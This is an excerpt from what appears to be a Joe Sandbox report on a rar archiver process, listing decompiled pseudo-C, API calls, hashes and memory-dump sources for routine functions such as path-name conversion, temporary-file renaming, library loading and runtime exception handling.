                                                                                                            • Opcode ID: 8975aeb35dc71cff5b495791c2abd2079040bb841d2cfc6cb54e9542606bb07e
                                                                                                            • Instruction ID: 9a29dbb13cef60fc99fe0cc059a403a2fb75fa5a35b211bf3c2425148ea39ed8
                                                                                                            • Opcode Fuzzy Hash: 8975aeb35dc71cff5b495791c2abd2079040bb841d2cfc6cb54e9542606bb07e
                                                                                                            • Instruction Fuzzy Hash: E302BD62B0C683A5EA64DA2591953FE2792AB177C0F480031DA8FE77C6DFBEE544C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B319FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E00007FF67FF650B319FC(long long __rbx, void* __rcx, long long __rdi, long long __rsi) {
				void* __rbp;
				void* _t34;
				void* _t38;
				signed int _t43;
				void* _t63;
				void* _t64;
				void* _t65;
				signed short _t66;
				void* _t81;
				signed long long _t82;
				signed long long _t83;
				void* _t85;
				long _t127;
				void* _t128;
				void* _t130;
				void* _t137;
				void* _t138;
				void* _t139;
				WCHAR* _t141;
				WCHAR* _t143;

				_t81 = _t130;
				 *((long long*)(_t81 + 0x10)) = __rbx;
				 *((long long*)(_t81 + 0x18)) = __rsi;
				 *((long long*)(_t81 + 0x20)) = __rdi;
				_t128 = _t81 - 0x4f88;
				_t34 = E00007FF67FF650B69CB0(0x5070, _t81, _t138, _t139);
				_t131 = _t130 - _t81;
				_t82 =  *0x50b978f0; // 0x27db226282f1
				_t83 = _t82 ^ _t130 - _t81;
				 *(_t128 + 0x4f60) = _t83;
				_t85 = __rcx;
				r15d = 0x800;
				r8d = r15d;
				__imp__GetLongPathNameW();
				_t65 = _t143 - 2;
				if (_t34 - 1 - _t65 > 0) goto 0x50b31bf7;
				r8d = r15d;
				if (GetShortPathNameW(_t143, _t141, _t127) - 1 - _t65 > 0) goto 0x50b31bf7;
				_t38 = E00007FF67FF650B4511C(GetShortPathNameW(_t143, _t141, _t127) - 1, _t83, _t128 + 0x2f60);
				E00007FF67FF650B4511C(_t38, _t83, _t128 + 0x3f60);
				r14d = 0;
				if ( *_t83 == r14w) goto 0x50b31bf7;
				if (E00007FF67FF650B5D600(_t83, _t83) == 0) goto 0x50b31bf7;
				E00007FF67FF650B4511C(_t40, _t83, __rcx);
				if (E00007FF67FF650B5D600(_t83, _t83) != 0) goto 0x50b31bf7;
				_t43 = r14w & 0xffffffff;
				 *(_t128 + 0xf60) = _t43;
				_t66 = r14d;
				if (_t43 != 0) goto 0x50b31b4f;
				E00007FF67FF650B4511C(E00007FF67FF650B5A390(_t128 + 0xf60, __rcx, _t143), _t83, _t128 + 0xf60);
				r9d = _t66;
				E00007FF67FF650B1657C(_t63, _t83, _t83, _t143, L"rtmp%d", _t137);
				if (E00007FF67FF650B3345C() == 0) goto 0x50b31b34;
				 *(_t128 + 0xf60) = r14d;
				goto 0x50b31b3b;
				if (_t66 + 0x7b - 0x2710 < 0) goto 0x50b31ae0;
				if (( *(_t128 + 0xf60) & 0x0000ffff) == 0) goto 0x50b31bf7;
				E00007FF67FF650B5A390(_t128 + 0x1f60, _t85, _t143);
				E00007FF67FF650B45224(_t64,  *(_t128 + 0xf60) & 0x0000ffff, _t83, _t85, _t128 + 0x1f60, _t83, _t83, _t83, _t128, _t143);
				if (MoveFileW(??, ??) == 0) goto 0x50b31bf7;
				E00007FF67FF650B31C28(_t130 - _t81 + 0x20);
				dil = r14b;
				if (E00007FF67FF650B3345C() != 0) goto 0x50b31bbb;
				r8d = 0x12;
				dil = E00007FF67FF650B31E84(_t83, _t131 + 0x20, _t85);
				MoveFileW(??, ??);
				if (dil == 0) goto 0x50b31be9;
				E00007FF67FF650B31CF0(_t85, _t131 + 0x20);
				E00007FF67FF650B31FB0(_t131 + 0x20);
				E00007FF67FF650B31C70(_t131 + 0x20);
				goto 0x50b31bf9;
				return E00007FF67FF650B69D10(0, _t63,  *(_t128 + 0x4f60) ^ _t131);
			}























                                                                                                            0x7ff650b319fc
                                                                                                            0x7ff650b319ff
                                                                                                            0x7ff650b31a03
                                                                                                            0x7ff650b31a07
                                                                                                            0x7ff650b31a10
                                                                                                            0x7ff650b31a1c
                                                                                                            0x7ff650b31a21
                                                                                                            0x7ff650b31a24
                                                                                                            0x7ff650b31a2b
                                                                                                            0x7ff650b31a2e
                                                                                                            0x7ff650b31a35
                                                                                                            0x7ff650b31a38
                                                                                                            0x7ff650b31a3e
                                                                                                            0x7ff650b31a48
                                                                                                            0x7ff650b31a50
                                                                                                            0x7ff650b31a56
                                                                                                            0x7ff650b31a5c
                                                                                                            0x7ff650b31a73
                                                                                                            0x7ff650b31a80
                                                                                                            0x7ff650b31a8f
                                                                                                            0x7ff650b31a97
                                                                                                            0x7ff650b31a9e
                                                                                                            0x7ff650b31ab1
                                                                                                            0x7ff650b31aba
                                                                                                            0x7ff650b31acc
                                                                                                            0x7ff650b31ad2
                                                                                                            0x7ff650b31ad6
                                                                                                            0x7ff650b31add
                                                                                                            0x7ff650b31ae3
                                                                                                            0x7ff650b31afe
                                                                                                            0x7ff650b31b06
                                                                                                            0x7ff650b31b13
                                                                                                            0x7ff650b31b26
                                                                                                            0x7ff650b31b2b
                                                                                                            0x7ff650b31b32
                                                                                                            0x7ff650b31b44
                                                                                                            0x7ff650b31b49
                                                                                                            0x7ff650b31b5c
                                                                                                            0x7ff650b31b6e
                                                                                                            0x7ff650b31b89
                                                                                                            0x7ff650b31b90
                                                                                                            0x7ff650b31b96
                                                                                                            0x7ff650b31ba3
                                                                                                            0x7ff650b31ba5
                                                                                                            0x7ff650b31bb8
                                                                                                            0x7ff650b31bc9
                                                                                                            0x7ff650b31bd2
                                                                                                            0x7ff650b31bd9
                                                                                                            0x7ff650b31be3
                                                                                                            0x7ff650b31bee
                                                                                                            0x7ff650b31bf5
                                                                                                            0x7ff650b31c24

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                            • String ID: rtmp%d
                                                                                                            • API String ID: 2308737092-3303766350
                                                                                                            • Opcode ID: d6bea91b97cf07f675e66f74c895e8fe2791780d01b27fcc154c8dbde5665edb
                                                                                                            • Instruction ID: 3adfca7214ef4222f5e892ad363b601381353b6e63aa2b86117d4350dfd720d1
                                                                                                            • Opcode Fuzzy Hash: d6bea91b97cf07f675e66f74c895e8fe2791780d01b27fcc154c8dbde5665edb
                                                                                                            • Instruction Fuzzy Hash: F251842261898766EA30AF25C8801FD6365FF4ABC4F5C4431D90EEB79AEE3ED605C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6E9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E00007FF67FF650B6E9EC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x7ff650b10000 + 0xa39f8 + _t81 * 8));
				if (_t61 == _t101) goto 0x50b6eb1b;
				if (_t61 != 0) goto 0x50b6eb1d;
				if (__r8 == __r9) goto 0x50b6eb13;
				_t67 =  *((intOrPtr*)(0x7ff650b10000 + 0xa39e0 + __rsi * 8));
				if (_t67 == 0) goto 0x50b6ea5e;
				if (_t67 != _t101) goto 0x50b6eaf5;
				goto 0x50b6eac9;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x50b6ead5;
				if (GetLastError() != 0x57) goto 0x50b6eab7;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00007FF67FF650B71950(__r8) == 0) goto 0x50b6eab7;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x50b6ead5;
				 *((intOrPtr*)(0x7ff650b10000 + 0xa39e0 + __rsi * 8)) = _t101;
				goto 0x50b6ea3c;
				_t21 = 0x7ff650b10000 + 0xa39e0 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x50b6eaf5;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x50b6eb13;
				 *((intOrPtr*)(0x7ff650b10000 + 0xa39f8 + _t81 * 8)) = _t65;
				goto 0x50b6eb1d;
				 *((intOrPtr*)(0x7ff650b10000 + 0xa39f8 + _t81 * 8)) = _t101;
				return 0;
			}















                                                                                                            0x7ff650b6e9ec
                                                                                                            0x7ff650b6e9f1
                                                                                                            0x7ff650b6e9f6
                                                                                                            0x7ff650b6ea11
                                                                                                            0x7ff650b6ea1e
                                                                                                            0x7ff650b6ea2a
                                                                                                            0x7ff650b6ea33
                                                                                                            0x7ff650b6ea3c
                                                                                                            0x7ff650b6ea45
                                                                                                            0x7ff650b6ea51
                                                                                                            0x7ff650b6ea56
                                                                                                            0x7ff650b6ea5c
                                                                                                            0x7ff650b6ea6b
                                                                                                            0x7ff650b6ea71
                                                                                                            0x7ff650b6ea77
                                                                                                            0x7ff650b6ea7d
                                                                                                            0x7ff650b6ea88
                                                                                                            0x7ff650b6ea8a
                                                                                                            0x7ff650b6ea8a
                                                                                                            0x7ff650b6ea9f
                                                                                                            0x7ff650b6eaa1
                                                                                                            0x7ff650b6eaa9
                                                                                                            0x7ff650b6eab5
                                                                                                            0x7ff650b6eac1
                                                                                                            0x7ff650b6ead0
                                                                                                            0x7ff650b6eadf
                                                                                                            0x7ff650b6eadf
                                                                                                            0x7ff650b6eadf
                                                                                                            0x7ff650b6eaea
                                                                                                            0x7ff650b6eaef
                                                                                                            0x7ff650b6eafb
                                                                                                            0x7ff650b6eb04
                                                                                                            0x7ff650b6eb09
                                                                                                            0x7ff650b6eb11
                                                                                                            0x7ff650b6eb13
                                                                                                            0x7ff650b6eb39

                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF650B6EBF3,?,?,?,00007FF650B6C93E,?,?,?,00007FF650B6C8F9), ref: 00007FF650B6EA71
                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00007FF650B6EBF3,?,?,?,00007FF650B6C93E,?,?,?,00007FF650B6C8F9), ref: 00007FF650B6EA7F
                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF650B6EBF3,?,?,?,00007FF650B6C93E,?,?,?,00007FF650B6C8F9), ref: 00007FF650B6EAA9
                                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,00007FF650B6EBF3,?,?,?,00007FF650B6C93E,?,?,?,00007FF650B6C8F9), ref: 00007FF650B6EAEF
                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF650B6EBF3,?,?,?,00007FF650B6C93E,?,?,?,00007FF650B6C8F9), ref: 00007FF650B6EAFB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                            • Opcode ID: 973635bde5b2e0345382fa1138aa855dddaf68a423dcb6a66578b5a15b5d8629
                                                                                                            • Instruction ID: b9f62d6e9e9a30848a05b303909e3385c3ecd7e3b40a32fa6020e0916f8af989
                                                                                                            • Opcode Fuzzy Hash: 973635bde5b2e0345382fa1138aa855dddaf68a423dcb6a66578b5a15b5d8629
                                                                                                            • Instruction Fuzzy Hash: 2131D221B1A743A1EE51DF82A8846753294FF0ABA0F1D0534ED6FAB394EF7EE4408700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5AF88 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                            • String ID: rar -ioff
                                                                                                            • API String ID: 4151682896-4089728129
                                                                                                            • Opcode ID: 1b5e6491dc8838dc94cf49e36af7f603b8dcb83ca489a1babd9beabadfd88b86
                                                                                                            • Instruction ID: 4e45487594b43e64add8c666a8917f5ae4428954f6f8840501bd25d27902c55a
                                                                                                            • Opcode Fuzzy Hash: 1b5e6491dc8838dc94cf49e36af7f603b8dcb83ca489a1babd9beabadfd88b86
                                                                                                            • Instruction Fuzzy Hash: 53014F69D19B07B3FA65AB61E8E463432A0AF4AB41F9C4431C84FF6360CE3EE0488300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5ADC4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                            • API String ID: 667068680-1824683568
                                                                                                            • Opcode ID: 544c58370b4641130b12ce8ae3976ff73507b9f67e2db789e5f2830226a1e540
                                                                                                            • Instruction ID: 816664e7457302a1ed257c5dc134a48a18b7a4942a870442096af16bfc2b0c3f
                                                                                                            • Opcode Fuzzy Hash: 544c58370b4641130b12ce8ae3976ff73507b9f67e2db789e5f2830226a1e540
                                                                                                            • Instruction Fuzzy Hash: 1AF0DA79A19B47E2EE948B15F8E517523A0EF4ABC0B5C9034C91FA6374EE3EE558C304
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5B5A8 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 2092733347-0
                                                                                                            • Opcode ID: 970899b41a201cd8a3ad0bc2b0ffc6df433935192528639b287ac6f88b35dade
                                                                                                            • Instruction ID: d53382f84743aa4ec464f9fd70273be77d18ffcc0d3c5d71e92218e805f06fc8
                                                                                                            • Opcode Fuzzy Hash: 970899b41a201cd8a3ad0bc2b0ffc6df433935192528639b287ac6f88b35dade
                                                                                                            • Instruction Fuzzy Hash: FC519DB2F146529AEB54CF64D4845AC37B1FB48788B64403ADE0EA7B58EF39D542CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5BB7C Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 2092733347-0
                                                                                                            • Opcode ID: 9180d91c912ebd364567bf7c7e184d9727d3836e3379687fb217088db351a68c
                                                                                                            • Instruction ID: 1d902731f9d8a92276205c26764855c5f5dea9126789005e595c5516f66ada2a
                                                                                                            • Opcode Fuzzy Hash: 9180d91c912ebd364567bf7c7e184d9727d3836e3379687fb217088db351a68c
                                                                                                            • Instruction Fuzzy Hash: CD313766B146529EEB40CFB5D8801AC3770FF08758B58502AEE0EA7B68EF78D895C704
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6D3C8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 61%
                                                                                                            			E00007FF67FF650B6D3C8(void* __edx, intOrPtr* __rcx, void* __rdx, long long __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t94;
				intOrPtr _t95;
				intOrPtr _t125;
				void* _t126;
				void* _t136;
				intOrPtr _t137;
				signed long long _t143;
				long long _t145;
				long long _t150;
				void* _t151;
				intOrPtr* _t171;
				long long _t182;
				long long _t183;
				intOrPtr* _t184;
				void* _t185;
				intOrPtr* _t186;
				intOrPtr* _t187;
				void* _t188;
				signed long long _t189;
				intOrPtr _t197;
				void* _t204;
				long long _t205;

				_t126 = __edx;
				_t187 = _t188 - 0x38;
				_t189 = _t188 - 0x138;
				_t143 =  *0x50b978f0; // 0x27db226282f1
				 *(_t187 + 0x28) = _t143 ^ _t189;
				_t185 = __r9;
				_t145 =  *((intOrPtr*)(_t187 + 0xb8));
				_t204 = __rdx;
				_t205 =  *((intOrPtr*)(_t187 + 0xa0));
				_t186 = __rcx;
				 *((long long*)(_t189 + 0x70)) = _t145;
				 *((long long*)(_t189 + 0x78)) = __r8;
				if ( *__rcx == 0x80000003) goto 0x50b6d691;
				E00007FF67FF650B6C8F0(_t145);
				r12d =  *((intOrPtr*)(_t187 + 0xb0));
				r15d =  *((intOrPtr*)(_t187 + 0xa8));
				if ( *((long long*)(_t145 + 0x10)) == 0) goto 0x50b6d490;
				__imp__EncodePointer();
				_t160 = _t145;
				E00007FF67FF650B6C8F0(_t145);
				if ( *((intOrPtr*)(_t145 + 0x10)) == _t145) goto 0x50b6d490;
				if ( *__rcx == 0xe0434f4d) goto 0x50b6d490;
				if ( *__rcx == 0xe0434352) goto 0x50b6d490;
				 *((intOrPtr*)(_t189 + 0x38)) = r15d;
				 *(_t189 + 0x30) =  *((intOrPtr*)(_t189 + 0x70));
				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
				 *((long long*)(_t189 + 0x20)) = _t205;
				if (E00007FF67FF650B6B208(__rcx, __rdx,  *((intOrPtr*)(_t189 + 0x78)), __r9) != 0) goto 0x50b6d691;
				E00007FF67FF650B6DC4C(_t187, _t205,  *((intOrPtr*)(__r9 + 8)));
				if ( *_t187 <= 0) goto 0x50b6d6b1;
				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
				 *((long long*)(_t189 + 0x20)) = _t205;
				r8d = r15d;
				_t94 = E00007FF67FF650B6B3E0(_t145, _t187 - 0x70, _t187, _t185, __rcx, _t187);
				asm("movups xmm0, [ebp-0x70]");
				asm("movdqu [ebp-0x80], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t94 -  *((intOrPtr*)(_t187 - 0x58)) >= 0) goto 0x50b6d691;
				_t95 =  *((intOrPtr*)(_t187 - 0x78));
				 *((long long*)(_t189 + 0x68)) =  *((intOrPtr*)(_t187 - 0x70));
				 *((intOrPtr*)(_t189 + 0x60)) = _t95;
				asm("inc ecx");
				asm("dec ax");
				asm("movups [ebp-0x80], xmm0");
				if (_t95 - r15d > 0) goto 0x50b6d5f7;
				_t136 = r15d - _t95;
				if (_t136 > 0) goto 0x50b6d5f7;
				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x10))));
				E00007FF67FF650B6DBD0( *((intOrPtr*)(_t185 + 0x10)), _t187 - 0x50, _t187 - 0x80,  *((intOrPtr*)(_t185 + 8)));
				 *((long long*)(_t187 - 0x48)) =  *((intOrPtr*)(_t187 - 0x40));
				E00007FF67FF650B6DFD0( *((intOrPtr*)(_t187 - 0x40)), _t187 - 0x50);
				_t150 =  *((intOrPtr*)(_t187 - 0x40));
				 *((long long*)(_t187 - 0x48)) = _t150;
				E00007FF67FF650B6DFD0(_t150, _t187 - 0x50);
				if (_t136 == 0) goto 0x50b6d56e;
				E00007FF67FF650B6DFD0(_t150, _t187 - 0x50);
				if (_t136 != 0) goto 0x50b6d55f;
				_t137 =  *((intOrPtr*)(_t187 - 0x30));
				if (_t137 == 0) goto 0x50b6d59c;
				E00007FF67FF650B6B8C0(_t150);
				_t151 = _t150 +  *((intOrPtr*)(_t187 - 0x30));
				if (_t137 == 0) goto 0x50b6d59c;
				if (_t126 == 0) goto 0x50b6d594;
				E00007FF67FF650B6B8C0(_t151);
				goto 0x50b6d596;
				if ( *((char*)(_t151 +  *((intOrPtr*)(_t187 - 0x30)) + 0x10)) != 0) goto 0x50b6d5eb;
				if (( *(_t187 - 0x34) & 0x00000040) != 0) goto 0x50b6d5eb;
				 *((char*)(_t189 + 0x58)) = 0;
				_t171 = _t186;
				 *((char*)(_t189 + 0x50)) = 1;
				 *((long long*)(_t189 + 0x48)) =  *((intOrPtr*)(_t189 + 0x70));
